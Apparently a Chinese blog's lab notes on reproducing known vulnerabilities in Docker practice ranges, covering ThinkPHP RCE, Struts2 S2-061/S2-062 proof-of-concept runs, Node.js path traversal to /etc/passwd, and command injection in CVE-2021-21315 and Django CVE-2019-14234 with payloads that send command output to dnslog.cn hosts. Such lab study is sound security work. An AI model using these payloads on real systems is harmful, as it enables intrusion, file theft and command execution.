服务攻防-框架安全(漏洞复现)

关闭靶场

sudo docker-compose down

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

运行dockers容器

docker exec -it 64052abd288b /bin/bash

thinkphp框架

thinkphp 2 - rce漏洞复现

docker exec -it 731dbae0e0b5 /bin/bash

集成化工具扫描

可以命令执行

thinkphp/5.0.23-rce

集成化工具利用

thinkphp/5-rce

直接梭哈

thinkphp/in-sqlinjection

Struts2

S2-009

梭哈

struts2 命令执行 (CVE-2016-3081)

直接梭哈

061rce和nc

python3 struts2-061-poc.py http://123.58.224.8:64423 "ls /tmp"

python2 S2-061-shell.py http://123.58.224.8:64423

S2-062

python3 s2-062.py --url http://123.58.224.8:25807 --cmd whoami

靶场无回显

Node.js

目录穿越

GET /static/../../../a/../../../../etc/passwd HTTP/1.1

CVE-2021-21315

Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315

配合dnslog。Cn带外检测

/api/getServices?name[]=$(ping%20`ls%20/tmp`.5afckd.dnslog.cn)

Django

CVE-2019-14234

单引号已注入成功,SQL 语句报错:

/admin/vuln/collection/?detail__a%27b=123

创建 cmd_exec:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20

调用 cmd_exec 执行命令:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping 37p5oe.dmp4tj.dnslog.cn%27--%20

/shiro-721

shiro-cve_2016_4437

solr

相关推荐
Flittly25 分钟前
【SpringSecurity新手村系列】(2)整合 MyBatis 实现数据库认证
java·安全·spring·springboot·安全架构
Andya_net32 分钟前
网络安全 | NPing网络包生成工具详解
网络·安全·web安全
西杭35 分钟前
Claude读论文系列(九)
安全
charlie11451419137 分钟前
嵌入式C++工程实践——第13篇:第一次重构 —— enum class取代宏,类型安全的开始
开发语言·c++·vscode·stm32·安全·重构·现代c++
易连EDI—EasyLink41 分钟前
易连EDI EasyLink:新OFTP2安全算法 RSA-PSS、RSA-OAEP、SHA3-512筑牢企业EDI传输安全防线
网络·人工智能·安全·edi·电子数据交换·as2
听你说321 小时前
鹏辉能源全极耳小圆柱:高安全+高功率,驱动低空经济/BBU/机器人市场增长
安全·机器人·能源
捉鸭子1 小时前
海关总署瑞数vmp算法还原
python·网络安全·node.js·网络爬虫
ll_af2 小时前
内网渗透完整链路:从外网打点到域控权限
网络·安全·web安全
xixixi777772 小时前
跨境AI服务:多语种大模型+卫星通信+量子加密+数据脱敏+安全审计,合规·高效·安全三重保障
人工智能·安全·大模型·通信·卫星通信·审计·量子安全
其实防守也摸鱼2 小时前
集成开发环境phpStudy安装与配置指南(包含DVWA)
网络·安全·php·web·ctf·工具配置